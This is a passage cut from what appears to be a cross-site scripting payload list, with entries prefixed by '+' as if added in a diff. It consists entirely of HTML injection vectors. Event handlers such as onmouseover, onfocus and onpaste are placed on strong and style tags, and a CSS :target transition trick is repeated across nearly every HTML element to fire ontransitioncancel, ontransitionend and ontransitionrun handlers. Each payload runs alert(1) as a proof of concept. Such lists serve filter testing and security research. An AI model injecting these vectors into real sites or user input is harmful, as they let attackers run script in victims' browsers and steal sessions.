onmousemove="alert(1)">test</strong> +<strong onmouseout="alert(1)">test</strong> +<strong onmouseover="alert(1)">test</strong> +<strong onmouseup="alert(1)">test</strong> +<strong onpaste="alert(1)" contenteditable>test</strong> +<style draggable="true" ondrag="alert(1)">test</style> +<style draggable="true" ondragend="alert(1)">test</style> +<style draggable="true" ondragenter="alert(1)">test</style> +<style draggable="true" ondragleave="alert(1)">test</style> +<style draggable="true" ondragstart="alert(1)">test</style> +<style id=x tabindex=1 onactivate=alert(1)></style> +<style id=x tabindex=1 onbeforeactivate=alert(1)></style> +<style id=x tabindex=1 onbeforedeactivate=alert(1)></style><input autofocus> +<style id=x tabindex=1 ondeactivate=alert(1)></style><input id=y autofocus> +<style id=x tabindex=1 onfocus=alert(1)></style> +<style id=x tabindex=1 onfocusin=alert(1)></style> +<style onbeforecopy="alert(1)" contenteditable>test</style> +<style onbeforecut="alert(1)" contenteditable>test</style> +<style onbeforepaste="alert(1)" contenteditable>test</style> +<style onblur=alert(1) tabindex=1 id=x></style><input autofocus> +<style onclick="alert(1)">test</style> +<style oncontextmenu="alert(1)">test</style> +<style oncopy="alert(1)" contenteditable>test</style> +<style oncut="alert(1)" contenteditable>test</style> +<style ondblclick="alert(1)">test</style> +<style onfocusout=alert(1) tabindex=1 id=x></style><input autofocus> +<style onkeydown="alert(1)" contenteditable>test</style> +<style onkeypress="alert(1)" contenteditable>test</style> +<style onkeyup="alert(1)" contenteditable>test</style> +<style onload=alert(1)></style> +<style onmousedown="alert(1)">test</style> +<style onmouseenter="alert(1)">test</style> +<style onmouseleave="alert(1)">test</style> +<style onmousemove="alert(1)">test</style> +<style onmouseout="alert(1)">test</style> +<style onmouseover="alert(1)">test</style> +<style onmouseup="alert(1)">test</style> +<style onpaste="alert(1)" 
contenteditable>test</style> +<style onreadystatechange=alert(1)></style> +<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a> +<style>:target {color: red;}</style><abbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></abbr> +<style>:target {color: red;}</style><acronym id=x style="transition:color 10s" ontransitioncancel=alert(1)></acronym> +<style>:target {color: red;}</style><address id=x style="transition:color 10s" ontransitioncancel=alert(1)></address> +<style>:target {color: red;}</style><applet id=x style="transition:color 10s" ontransitioncancel=alert(1)></applet> +<style>:target {color: red;}</style><area id=x style="transition:color 10s" ontransitioncancel=alert(1)></area> +<style>:target {color: red;}</style><article id=x style="transition:color 10s" ontransitioncancel=alert(1)></article> +<style>:target {color: red;}</style><aside id=x style="transition:color 10s" ontransitioncancel=alert(1)></aside> +<style>:target {color: red;}</style><audio id=x style="transition:color 10s" ontransitioncancel=alert(1)></audio> +<style>:target {color: red;}</style><b id=x style="transition:color 10s" ontransitioncancel=alert(1)></b> +<style>:target {color: red;}</style><base id=x style="transition:color 10s" ontransitioncancel=alert(1)></base> +<style>:target {color: red;}</style><basefont id=x style="transition:color 10s" ontransitioncancel=alert(1)></basefont> +<style>:target {color: red;}</style><bdi id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdi> +<style>:target {color: red;}</style><bdo id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdo> +<style>:target {color: red;}</style><bgsound id=x style="transition:color 10s" ontransitioncancel=alert(1)></bgsound> +<style>:target {color: red;}</style><big id=x style="transition:color 10s" ontransitioncancel=alert(1)></big> +<style>:target {color: red;}</style><blink id=x style="transition:color 10s" 
ontransitioncancel=alert(1)></blink> +<style>:target {color: red;}</style><blockquote id=x style="transition:color 10s" ontransitioncancel=alert(1)></blockquote> +<style>:target {color: red;}</style><body id=x style="transition:color 10s" ontransitioncancel=alert(1)></body> +<style>:target {color: red;}</style><br id=x style="transition:color 10s" ontransitioncancel=alert(1)></br> +<style>:target {color: red;}</style><button id=x style="transition:color 10s" ontransitioncancel=alert(1)></button> +<style>:target {color: red;}</style><canvas id=x style="transition:color 10s" ontransitioncancel=alert(1)></canvas> +<style>:target {color: red;}</style><caption id=x style="transition:color 10s" ontransitioncancel=alert(1)></caption> +<style>:target {color: red;}</style><center id=x style="transition:color 10s" ontransitioncancel=alert(1)></center> +<style>:target {color: red;}</style><cite id=x style="transition:color 10s" ontransitioncancel=alert(1)></cite> +<style>:target {color: red;}</style><code id=x style="transition:color 10s" ontransitioncancel=alert(1)></code> +<style>:target {color: red;}</style><col id=x style="transition:color 10s" ontransitioncancel=alert(1)></col> +<style>:target {color: red;}</style><colgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></colgroup> +<style>:target {color: red;}</style><command id=x style="transition:color 10s" ontransitioncancel=alert(1)></command> +<style>:target {color: red;}</style><content id=x style="transition:color 10s" ontransitioncancel=alert(1)></content> +<style>:target {color: red;}</style><data id=x style="transition:color 10s" ontransitioncancel=alert(1)></data> +<style>:target {color: red;}</style><datalist id=x style="transition:color 10s" ontransitioncancel=alert(1)></datalist> +<style>:target {color: red;}</style><dd id=x style="transition:color 10s" ontransitioncancel=alert(1)></dd> +<style>:target {color: red;}</style><del id=x style="transition:color 10s" 
ontransitioncancel=alert(1)></del> +<style>:target {color: red;}</style><details id=x style="transition:color 10s" ontransitioncancel=alert(1)></details> +<style>:target {color: red;}</style><dfn id=x style="transition:color 10s" ontransitioncancel=alert(1)></dfn> +<style>:target {color: red;}</style><dialog id=x style="transition:color 10s" ontransitioncancel=alert(1)></dialog> +<style>:target {color: red;}</style><dir id=x style="transition:color 10s" ontransitioncancel=alert(1)></dir> +<style>:target {color: red;}</style><div id=x style="transition:color 10s" ontransitioncancel=alert(1)></div> +<style>:target {color: red;}</style><dl id=x style="transition:color 10s" ontransitioncancel=alert(1)></dl> +<style>:target {color: red;}</style><dt id=x style="transition:color 10s" ontransitioncancel=alert(1)></dt> +<style>:target {color: red;}</style><element id=x style="transition:color 10s" ontransitioncancel=alert(1)></element> +<style>:target {color: red;}</style><em id=x style="transition:color 10s" ontransitioncancel=alert(1)></em> +<style>:target {color: red;}</style><embed id=x style="transition:color 10s" ontransitioncancel=alert(1)></embed> +<style>:target {color: red;}</style><fieldset id=x style="transition:color 10s" ontransitioncancel=alert(1)></fieldset> +<style>:target {color: red;}</style><figcaption id=x style="transition:color 10s" ontransitioncancel=alert(1)></figcaption> +<style>:target {color: red;}</style><figure id=x style="transition:color 10s" ontransitioncancel=alert(1)></figure> +<style>:target {color: red;}</style><font id=x style="transition:color 10s" ontransitioncancel=alert(1)></font> +<style>:target {color: red;}</style><footer id=x style="transition:color 10s" ontransitioncancel=alert(1)></footer> +<style>:target {color: red;}</style><form id=x style="transition:color 10s" ontransitioncancel=alert(1)></form> +<style>:target {color: red;}</style><frame id=x style="transition:color 10s" ontransitioncancel=alert(1)></frame> 
+<style>:target {color: red;}</style><frameset id=x style="transition:color 10s" ontransitioncancel=alert(1)></frameset> +<style>:target {color: red;}</style><h1 id=x style="transition:color 10s" ontransitioncancel=alert(1)></h1> +<style>:target {color: red;}</style><head id=x style="transition:color 10s" ontransitioncancel=alert(1)></head> +<style>:target {color: red;}</style><header id=x style="transition:color 10s" ontransitioncancel=alert(1)></header> +<style>:target {color: red;}</style><hgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></hgroup> +<style>:target {color: red;}</style><hr id=x style="transition:color 10s" ontransitioncancel=alert(1)></hr> +<style>:target {color: red;}</style><html id=x style="transition:color 10s" ontransitioncancel=alert(1)></html> +<style>:target {color: red;}</style><i id=x style="transition:color 10s" ontransitioncancel=alert(1)></i> +<style>:target {color: red;}</style><iframe id=x style="transition:color 10s" ontransitioncancel=alert(1)></iframe> +<style>:target {color: red;}</style><image id=x style="transition:color 10s" ontransitioncancel=alert(1)></image> +<style>:target {color: red;}</style><img id=x style="transition:color 10s" ontransitioncancel=alert(1)></img> +<style>:target {color: red;}</style><input id=x style="transition:color 10s" ontransitioncancel=alert(1)></input> +<style>:target {color: red;}</style><ins id=x style="transition:color 10s" ontransitioncancel=alert(1)></ins> +<style>:target {color: red;}</style><isindex id=x style="transition:color 10s" ontransitioncancel=alert(1)></isindex> +<style>:target {color: red;}</style><kbd id=x style="transition:color 10s" ontransitioncancel=alert(1)></kbd> +<style>:target {color: red;}</style><keygen id=x style="transition:color 10s" ontransitioncancel=alert(1)></keygen> +<style>:target {color: red;}</style><label id=x style="transition:color 10s" ontransitioncancel=alert(1)></label> +<style>:target {color: red;}</style><legend id=x 
style="transition:color 10s" ontransitioncancel=alert(1)></legend> +<style>:target {color: red;}</style><li id=x style="transition:color 10s" ontransitioncancel=alert(1)></li> +<style>:target {color: red;}</style><link id=x style="transition:color 10s" ontransitioncancel=alert(1)></link> +<style>:target {color: red;}</style><listing id=x style="transition:color 10s" ontransitioncancel=alert(1)></listing> +<style>:target {color: red;}</style><main id=x style="transition:color 10s" ontransitioncancel=alert(1)></main> +<style>:target {color: red;}</style><map id=x style="transition:color 10s" ontransitioncancel=alert(1)></map> +<style>:target {color: red;}</style><mark id=x style="transition:color 10s" ontransitioncancel=alert(1)></mark> +<style>:target {color: red;}</style><marquee id=x style="transition:color 10s" ontransitioncancel=alert(1)></marquee> +<style>:target {color: red;}</style><menu id=x style="transition:color 10s" ontransitioncancel=alert(1)></menu> +<style>:target {color: red;}</style><menuitem id=x style="transition:color 10s" ontransitioncancel=alert(1)></menuitem> +<style>:target {color: red;}</style><meta id=x style="transition:color 10s" ontransitioncancel=alert(1)></meta> +<style>:target {color: red;}</style><meter id=x style="transition:color 10s" ontransitioncancel=alert(1)></meter> +<style>:target {color: red;}</style><multicol id=x style="transition:color 10s" ontransitioncancel=alert(1)></multicol> +<style>:target {color: red;}</style><nav id=x style="transition:color 10s" ontransitioncancel=alert(1)></nav> +<style>:target {color: red;}</style><nextid id=x style="transition:color 10s" ontransitioncancel=alert(1)></nextid> +<style>:target {color: red;}</style><nobr id=x style="transition:color 10s" ontransitioncancel=alert(1)></nobr> +<style>:target {color: red;}</style><noembed id=x style="transition:color 10s" ontransitioncancel=alert(1)></noembed> +<style>:target {color: red;}</style><noframes id=x style="transition:color 10s" 
ontransitioncancel=alert(1)></noframes> +<style>:target {color: red;}</style><noscript id=x style="transition:color 10s" ontransitioncancel=alert(1)></noscript> +<style>:target {color: red;}</style><object id=x style="transition:color 10s" ontransitioncancel=alert(1)></object> +<style>:target {color: red;}</style><ol id=x style="transition:color 10s" ontransitioncancel=alert(1)></ol> +<style>:target {color: red;}</style><optgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></optgroup> +<style>:target {color: red;}</style><option id=x style="transition:color 10s" ontransitioncancel=alert(1)></option> +<style>:target {color: red;}</style><output id=x style="transition:color 10s" ontransitioncancel=alert(1)></output> +<style>:target {color: red;}</style><p id=x style="transition:color 10s" ontransitioncancel=alert(1)></p> +<style>:target {color: red;}</style><param id=x style="transition:color 10s" ontransitioncancel=alert(1)></param> +<style>:target {color: red;}</style><picture id=x style="transition:color 10s" ontransitioncancel=alert(1)></picture> +<style>:target {color: red;}</style><plaintext id=x style="transition:color 10s" ontransitioncancel=alert(1)></plaintext> +<style>:target {color: red;}</style><pre id=x style="transition:color 10s" ontransitioncancel=alert(1)></pre> +<style>:target {color: red;}</style><progress id=x style="transition:color 10s" ontransitioncancel=alert(1)></progress> +<style>:target {color: red;}</style><q id=x style="transition:color 10s" ontransitioncancel=alert(1)></q> +<style>:target {color: red;}</style><rb id=x style="transition:color 10s" ontransitioncancel=alert(1)></rb> +<style>:target {color: red;}</style><rp id=x style="transition:color 10s" ontransitioncancel=alert(1)></rp> +<style>:target {color: red;}</style><rt id=x style="transition:color 10s" ontransitioncancel=alert(1)></rt> +<style>:target {color: red;}</style><rtc id=x style="transition:color 10s" ontransitioncancel=alert(1)></rtc> +<style>:target 
{color: red;}</style><ruby id=x style="transition:color 10s" ontransitioncancel=alert(1)></ruby> +<style>:target {color: red;}</style><s id=x style="transition:color 10s" ontransitioncancel=alert(1)></s> +<style>:target {color: red;}</style><samp id=x style="transition:color 10s" ontransitioncancel=alert(1)></samp> +<style>:target {color: red;}</style><script id=x style="transition:color 10s" ontransitioncancel=alert(1)></script> +<style>:target {color: red;}</style><section id=x style="transition:color 10s" ontransitioncancel=alert(1)></section> +<style>:target {color: red;}</style><select id=x style="transition:color 10s" ontransitioncancel=alert(1)></select> +<style>:target {color: red;}</style><shadow id=x style="transition:color 10s" ontransitioncancel=alert(1)></shadow> +<style>:target {color: red;}</style><slot id=x style="transition:color 10s" ontransitioncancel=alert(1)></slot> +<style>:target {color: red;}</style><small id=x style="transition:color 10s" ontransitioncancel=alert(1)></small> +<style>:target {color: red;}</style><source id=x style="transition:color 10s" ontransitioncancel=alert(1)></source> +<style>:target {color: red;}</style><spacer id=x style="transition:color 10s" ontransitioncancel=alert(1)></spacer> +<style>:target {color: red;}</style><span id=x style="transition:color 10s" ontransitioncancel=alert(1)></span> +<style>:target {color: red;}</style><strike id=x style="transition:color 10s" ontransitioncancel=alert(1)></strike> +<style>:target {color: red;}</style><strong id=x style="transition:color 10s" ontransitioncancel=alert(1)></strong> +<style>:target {color: red;}</style><style id=x style="transition:color 10s" ontransitioncancel=alert(1)></style> +<style>:target {color: red;}</style><sub id=x style="transition:color 10s" ontransitioncancel=alert(1)></sub> +<style>:target {color: red;}</style><summary id=x style="transition:color 10s" ontransitioncancel=alert(1)></summary> +<style>:target {color: red;}</style><sup id=x 
style="transition:color 10s" ontransitioncancel=alert(1)></sup> +<style>:target {color: red;}</style><svg id=x style="transition:color 10s" ontransitioncancel=alert(1)></svg> +<style>:target {color: red;}</style><table id=x style="transition:color 10s" ontransitioncancel=alert(1)></table> +<style>:target {color: red;}</style><tbody id=x style="transition:color 10s" ontransitioncancel=alert(1)></tbody> +<style>:target {color: red;}</style><td id=x style="transition:color 10s" ontransitioncancel=alert(1)></td> +<style>:target {color: red;}</style><template id=x style="transition:color 10s" ontransitioncancel=alert(1)></template> +<style>:target {color: red;}</style><textarea id=x style="transition:color 10s" ontransitioncancel=alert(1)></textarea> +<style>:target {color: red;}</style><tfoot id=x style="transition:color 10s" ontransitioncancel=alert(1)></tfoot> +<style>:target {color: red;}</style><th id=x style="transition:color 10s" ontransitioncancel=alert(1)></th> +<style>:target {color: red;}</style><thead id=x style="transition:color 10s" ontransitioncancel=alert(1)></thead> +<style>:target {color: red;}</style><time id=x style="transition:color 10s" ontransitioncancel=alert(1)></time> +<style>:target {color: red;}</style><title id=x style="transition:color 10s" ontransitioncancel=alert(1)></title> +<style>:target {color: red;}</style><tr id=x style="transition:color 10s" ontransitioncancel=alert(1)></tr> +<style>:target {color: red;}</style><track id=x style="transition:color 10s" ontransitioncancel=alert(1)></track> +<style>:target {color: red;}</style><tt id=x style="transition:color 10s" ontransitioncancel=alert(1)></tt> +<style>:target {color: red;}</style><u id=x style="transition:color 10s" ontransitioncancel=alert(1)></u> +<style>:target {color: red;}</style><ul id=x style="transition:color 10s" ontransitioncancel=alert(1)></ul> +<style>:target {color: red;}</style><var id=x style="transition:color 10s" ontransitioncancel=alert(1)></var> +<style>:target 
{color: red;}</style><video id=x style="transition:color 10s" ontransitioncancel=alert(1)></video> +<style>:target {color: red;}</style><wbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></wbr> +<style>:target {color: red;}</style><xmp id=x style="transition:color 10s" ontransitioncancel=alert(1)></xmp> +<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a> +<style>:target {color:red;}</style><abbr id=x style="transition:color 1s" ontransitionend=alert(1)></abbr> +<style>:target {color:red;}</style><acronym id=x style="transition:color 1s" ontransitionend=alert(1)></acronym> +<style>:target {color:red;}</style><address id=x style="transition:color 1s" ontransitionend=alert(1)></address> +<style>:target {color:red;}</style><applet id=x style="transition:color 1s" ontransitionend=alert(1)></applet> +<style>:target {color:red;}</style><area id=x style="transition:color 1s" ontransitionend=alert(1)></area> +<style>:target {color:red;}</style><article id=x style="transition:color 1s" ontransitionend=alert(1)></article> +<style>:target {color:red;}</style><aside id=x style="transition:color 1s" ontransitionend=alert(1)></aside> +<style>:target {color:red;}</style><audio id=x style="transition:color 1s" ontransitionend=alert(1)></audio> +<style>:target {color:red;}</style><b id=x style="transition:color 1s" ontransitionend=alert(1)></b> +<style>:target {color:red;}</style><base id=x style="transition:color 1s" ontransitionend=alert(1)></base> +<style>:target {color:red;}</style><basefont id=x style="transition:color 1s" ontransitionend=alert(1)></basefont> +<style>:target {color:red;}</style><bdi id=x style="transition:color 1s" ontransitionend=alert(1)></bdi> +<style>:target {color:red;}</style><bdo id=x style="transition:color 1s" ontransitionend=alert(1)></bdo> +<style>:target {color:red;}</style><bgsound id=x style="transition:color 1s" ontransitionend=alert(1)></bgsound> +<style>:target 
{color:red;}</style><big id=x style="transition:color 1s" ontransitionend=alert(1)></big> +<style>:target {color:red;}</style><blink id=x style="transition:color 1s" ontransitionend=alert(1)></blink> +<style>:target {color:red;}</style><blockquote id=x style="transition:color 1s" ontransitionend=alert(1)></blockquote> +<style>:target {color:red;}</style><body id=x style="transition:color 1s" ontransitionend=alert(1)></body> +<style>:target {color:red;}</style><br id=x style="transition:color 1s" ontransitionend=alert(1)></br> +<style>:target {color:red;}</style><button id=x style="transition:color 1s" ontransitionend=alert(1)></button> +<style>:target {color:red;}</style><canvas id=x style="transition:color 1s" ontransitionend=alert(1)></canvas> +<style>:target {color:red;}</style><caption id=x style="transition:color 1s" ontransitionend=alert(1)></caption> +<style>:target {color:red;}</style><center id=x style="transition:color 1s" ontransitionend=alert(1)></center> +<style>:target {color:red;}</style><cite id=x style="transition:color 1s" ontransitionend=alert(1)></cite> +<style>:target {color:red;}</style><code id=x style="transition:color 1s" ontransitionend=alert(1)></code> +<style>:target {color:red;}</style><col id=x style="transition:color 1s" ontransitionend=alert(1)></col> +<style>:target {color:red;}</style><colgroup id=x style="transition:color 1s" ontransitionend=alert(1)></colgroup> +<style>:target {color:red;}</style><command id=x style="transition:color 1s" ontransitionend=alert(1)></command> +<style>:target {color:red;}</style><content id=x style="transition:color 1s" ontransitionend=alert(1)></content> +<style>:target {color:red;}</style><data id=x style="transition:color 1s" ontransitionend=alert(1)></data> +<style>:target {color:red;}</style><datalist id=x style="transition:color 1s" ontransitionend=alert(1)></datalist> +<style>:target {color:red;}</style><dd id=x style="transition:color 1s" ontransitionend=alert(1)></dd> +<style>:target 
{color:red;}</style><del id=x style="transition:color 1s" ontransitionend=alert(1)></del> +<style>:target {color:red;}</style><details id=x style="transition:color 1s" ontransitionend=alert(1)></details> +<style>:target {color:red;}</style><dfn id=x style="transition:color 1s" ontransitionend=alert(1)></dfn> +<style>:target {color:red;}</style><dialog id=x style="transition:color 1s" ontransitionend=alert(1)></dialog> +<style>:target {color:red;}</style><dir id=x style="transition:color 1s" ontransitionend=alert(1)></dir> +<style>:target {color:red;}</style><div id=x style="transition:color 1s" ontransitionend=alert(1)></div> +<style>:target {color:red;}</style><dl id=x style="transition:color 1s" ontransitionend=alert(1)></dl> +<style>:target {color:red;}</style><dt id=x style="transition:color 1s" ontransitionend=alert(1)></dt> +<style>:target {color:red;}</style><element id=x style="transition:color 1s" ontransitionend=alert(1)></element> +<style>:target {color:red;}</style><em id=x style="transition:color 1s" ontransitionend=alert(1)></em> +<style>:target {color:red;}</style><embed id=x style="transition:color 1s" ontransitionend=alert(1)></embed> +<style>:target {color:red;}</style><fieldset id=x style="transition:color 1s" ontransitionend=alert(1)></fieldset> +<style>:target {color:red;}</style><figcaption id=x style="transition:color 1s" ontransitionend=alert(1)></figcaption> +<style>:target {color:red;}</style><figure id=x style="transition:color 1s" ontransitionend=alert(1)></figure> +<style>:target {color:red;}</style><font id=x style="transition:color 1s" ontransitionend=alert(1)></font> +<style>:target {color:red;}</style><footer id=x style="transition:color 1s" ontransitionend=alert(1)></footer> +<style>:target {color:red;}</style><form id=x style="transition:color 1s" ontransitionend=alert(1)></form> +<style>:target {color:red;}</style><frame id=x style="transition:color 1s" ontransitionend=alert(1)></frame> +<style>:target 
{color:red;}</style><frameset id=x style="transition:color 1s" ontransitionend=alert(1)></frameset> +<style>:target {color:red;}</style><h1 id=x style="transition:color 1s" ontransitionend=alert(1)></h1> +<style>:target {color:red;}</style><head id=x style="transition:color 1s" ontransitionend=alert(1)></head> +<style>:target {color:red;}</style><header id=x style="transition:color 1s" ontransitionend=alert(1)></header> +<style>:target {color:red;}</style><hgroup id=x style="transition:color 1s" ontransitionend=alert(1)></hgroup> +<style>:target {color:red;}</style><hr id=x style="transition:color 1s" ontransitionend=alert(1)></hr> +<style>:target {color:red;}</style><html id=x style="transition:color 1s" ontransitionend=alert(1)></html> +<style>:target {color:red;}</style><i id=x style="transition:color 1s" ontransitionend=alert(1)></i> +<style>:target {color:red;}</style><iframe id=x style="transition:color 1s" ontransitionend=alert(1)></iframe> +<style>:target {color:red;}</style><image id=x style="transition:color 1s" ontransitionend=alert(1)></image> +<style>:target {color:red;}</style><img id=x style="transition:color 1s" ontransitionend=alert(1)></img> +<style>:target {color:red;}</style><input id=x style="transition:color 1s" ontransitionend=alert(1)></input> +<style>:target {color:red;}</style><ins id=x style="transition:color 1s" ontransitionend=alert(1)></ins> +<style>:target {color:red;}</style><isindex id=x style="transition:color 1s" ontransitionend=alert(1)></isindex> +<style>:target {color:red;}</style><kbd id=x style="transition:color 1s" ontransitionend=alert(1)></kbd> +<style>:target {color:red;}</style><keygen id=x style="transition:color 1s" ontransitionend=alert(1)></keygen> +<style>:target {color:red;}</style><label id=x style="transition:color 1s" ontransitionend=alert(1)></label> +<style>:target {color:red;}</style><legend id=x style="transition:color 1s" ontransitionend=alert(1)></legend> +<style>:target {color:red;}</style><li id=x 
style="transition:color 1s" ontransitionend=alert(1)></li> +<style>:target {color:red;}</style><link id=x style="transition:color 1s" ontransitionend=alert(1)></link> +<style>:target {color:red;}</style><listing id=x style="transition:color 1s" ontransitionend=alert(1)></listing> +<style>:target {color:red;}</style><main id=x style="transition:color 1s" ontransitionend=alert(1)></main> +<style>:target {color:red;}</style><map id=x style="transition:color 1s" ontransitionend=alert(1)></map> +<style>:target {color:red;}</style><mark id=x style="transition:color 1s" ontransitionend=alert(1)></mark> +<style>:target {color:red;}</style><marquee id=x style="transition:color 1s" ontransitionend=alert(1)></marquee> +<style>:target {color:red;}</style><menu id=x style="transition:color 1s" ontransitionend=alert(1)></menu> +<style>:target {color:red;}</style><menuitem id=x style="transition:color 1s" ontransitionend=alert(1)></menuitem> +<style>:target {color:red;}</style><meta id=x style="transition:color 1s" ontransitionend=alert(1)></meta> +<style>:target {color:red;}</style><meter id=x style="transition:color 1s" ontransitionend=alert(1)></meter> +<style>:target {color:red;}</style><multicol id=x style="transition:color 1s" ontransitionend=alert(1)></multicol> +<style>:target {color:red;}</style><nav id=x style="transition:color 1s" ontransitionend=alert(1)></nav> +<style>:target {color:red;}</style><nextid id=x style="transition:color 1s" ontransitionend=alert(1)></nextid> +<style>:target {color:red;}</style><nobr id=x style="transition:color 1s" ontransitionend=alert(1)></nobr> +<style>:target {color:red;}</style><noembed id=x style="transition:color 1s" ontransitionend=alert(1)></noembed> +<style>:target {color:red;}</style><noframes id=x style="transition:color 1s" ontransitionend=alert(1)></noframes> +<style>:target {color:red;}</style><noscript id=x style="transition:color 1s" ontransitionend=alert(1)></noscript> +<style>:target {color:red;}</style><object id=x 
style="transition:color 1s" ontransitionend=alert(1)></object> +<style>:target {color:red;}</style><ol id=x style="transition:color 1s" ontransitionend=alert(1)></ol> +<style>:target {color:red;}</style><optgroup id=x style="transition:color 1s" ontransitionend=alert(1)></optgroup> +<style>:target {color:red;}</style><option id=x style="transition:color 1s" ontransitionend=alert(1)></option> +<style>:target {color:red;}</style><output id=x style="transition:color 1s" ontransitionend=alert(1)></output> +<style>:target {color:red;}</style><p id=x style="transition:color 1s" ontransitionend=alert(1)></p> +<style>:target {color:red;}</style><param id=x style="transition:color 1s" ontransitionend=alert(1)></param> +<style>:target {color:red;}</style><picture id=x style="transition:color 1s" ontransitionend=alert(1)></picture> +<style>:target {color:red;}</style><plaintext id=x style="transition:color 1s" ontransitionend=alert(1)></plaintext> +<style>:target {color:red;}</style><pre id=x style="transition:color 1s" ontransitionend=alert(1)></pre> +<style>:target {color:red;}</style><progress id=x style="transition:color 1s" ontransitionend=alert(1)></progress> +<style>:target {color:red;}</style><q id=x style="transition:color 1s" ontransitionend=alert(1)></q> +<style>:target {color:red;}</style><rb id=x style="transition:color 1s" ontransitionend=alert(1)></rb> +<style>:target {color:red;}</style><rp id=x style="transition:color 1s" ontransitionend=alert(1)></rp> +<style>:target {color:red;}</style><rt id=x style="transition:color 1s" ontransitionend=alert(1)></rt> +<style>:target {color:red;}</style><rtc id=x style="transition:color 1s" ontransitionend=alert(1)></rtc> +<style>:target {color:red;}</style><ruby id=x style="transition:color 1s" ontransitionend=alert(1)></ruby> +<style>:target {color:red;}</style><s id=x style="transition:color 1s" ontransitionend=alert(1)></s> +<style>:target {color:red;}</style><samp id=x style="transition:color 1s" 
ontransitionend=alert(1)></samp> +<style>:target {color:red;}</style><script id=x style="transition:color 1s" ontransitionend=alert(1)></script> +<style>:target {color:red;}</style><section id=x style="transition:color 1s" ontransitionend=alert(1)></section> +<style>:target {color:red;}</style><select id=x style="transition:color 1s" ontransitionend=alert(1)></select> +<style>:target {color:red;}</style><shadow id=x style="transition:color 1s" ontransitionend=alert(1)></shadow> +<style>:target {color:red;}</style><slot id=x style="transition:color 1s" ontransitionend=alert(1)></slot> +<style>:target {color:red;}</style><small id=x style="transition:color 1s" ontransitionend=alert(1)></small> +<style>:target {color:red;}</style><source id=x style="transition:color 1s" ontransitionend=alert(1)></source> +<style>:target {color:red;}</style><spacer id=x style="transition:color 1s" ontransitionend=alert(1)></spacer> +<style>:target {color:red;}</style><span id=x style="transition:color 1s" ontransitionend=alert(1)></span> +<style>:target {color:red;}</style><strike id=x style="transition:color 1s" ontransitionend=alert(1)></strike> +<style>:target {color:red;}</style><strong id=x style="transition:color 1s" ontransitionend=alert(1)></strong> +<style>:target {color:red;}</style><style id=x style="transition:color 1s" ontransitionend=alert(1)></style> +<style>:target {color:red;}</style><sub id=x style="transition:color 1s" ontransitionend=alert(1)></sub> +<style>:target {color:red;}</style><summary id=x style="transition:color 1s" ontransitionend=alert(1)></summary> +<style>:target {color:red;}</style><sup id=x style="transition:color 1s" ontransitionend=alert(1)></sup> +<style>:target {color:red;}</style><svg id=x style="transition:color 1s" ontransitionend=alert(1)></svg> +<style>:target {color:red;}</style><table id=x style="transition:color 1s" ontransitionend=alert(1)></table> +<style>:target {color:red;}</style><tbody id=x style="transition:color 1s" 
ontransitionend=alert(1)></tbody> +<style>:target {color:red;}</style><td id=x style="transition:color 1s" ontransitionend=alert(1)></td> +<style>:target {color:red;}</style><template id=x style="transition:color 1s" ontransitionend=alert(1)></template> +<style>:target {color:red;}</style><textarea id=x style="transition:color 1s" ontransitionend=alert(1)></textarea> +<style>:target {color:red;}</style><tfoot id=x style="transition:color 1s" ontransitionend=alert(1)></tfoot> +<style>:target {color:red;}</style><th id=x style="transition:color 1s" ontransitionend=alert(1)></th> +<style>:target {color:red;}</style><thead id=x style="transition:color 1s" ontransitionend=alert(1)></thead> +<style>:target {color:red;}</style><time id=x style="transition:color 1s" ontransitionend=alert(1)></time> +<style>:target {color:red;}</style><title id=x style="transition:color 1s" ontransitionend=alert(1)></title> +<style>:target {color:red;}</style><tr id=x style="transition:color 1s" ontransitionend=alert(1)></tr> +<style>:target {color:red;}</style><track id=x style="transition:color 1s" ontransitionend=alert(1)></track> +<style>:target {color:red;}</style><tt id=x style="transition:color 1s" ontransitionend=alert(1)></tt> +<style>:target {color:red;}</style><u id=x style="transition:color 1s" ontransitionend=alert(1)></u> +<style>:target {color:red;}</style><ul id=x style="transition:color 1s" ontransitionend=alert(1)></ul> +<style>:target {color:red;}</style><var id=x style="transition:color 1s" ontransitionend=alert(1)></var> +<style>:target {color:red;}</style><video id=x style="transition:color 1s" ontransitionend=alert(1)></video> +<style>:target {color:red;}</style><wbr id=x style="transition:color 1s" ontransitionend=alert(1)></wbr> +<style>:target {color:red;}</style><xmp id=x style="transition:color 1s" ontransitionend=alert(1)></xmp> +<style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(1)></a> 
+<style>:target {transform: rotate(180deg);}</style><abbr id=x style="transition:transform 2s" ontransitionrun=alert(1)></abbr> +<style>:target {transform: rotate(180deg);}</style><acronym id=x style="transition:transform 2s" ontransitionrun=alert(1)></acronym> +<style>:target {transform: rotate(180deg);}</style><address id=x style="transition:transform 2s" ontransitionrun=alert(1)></address> +<style>:target {transform: rotate(180deg);}</style><applet id=x style="transition:transform 2s" ontransitionrun=alert(1)></applet> +<style>:target {transform: rotate(180deg);}</style><area id=x style="transition:transform 2s" ontransitionrun=alert(1)></area> +<style>:target {transform: rotate(180deg);}</style><article id=x style="transition:transform 2s" ontransitionrun=alert(1)></article> +<style>:target {transform: rotate(180deg);}</style><aside id=x style="transition:transform 2s" ontransitionrun=alert(1)></aside> +<style>:target {transform: rotate(180deg);}</style><audio id=x style="transition:transform 2s" ontransitionrun=alert(1)></audio> +<style>:target {transform: rotate(180deg);}</style><b id=x style="transition:transform 2s" ontransitionrun=alert(1)></b> +<style>:target {transform: rotate(180deg);}</style><base id=x style="transition:transform 2s" ontransitionrun=alert(1)></base> +<style>:target {transform: rotate(180deg);}</style><basefont id=x style="transition:transform 2s" ontransitionrun=alert(1)></basefont> +<style>:target {transform: rotate(180deg);}</style><bdi id=x style="transition:transform 2s" ontransitionrun=alert(1)></bdi> +<style>:target {transform: rotate(180deg);}</style><bdo id=x style="transition:transform 2s" ontransitionrun=alert(1)></bdo> +<style>:target {transform: rotate(180deg);}</style><bgsound id=x style="transition:transform 2s" 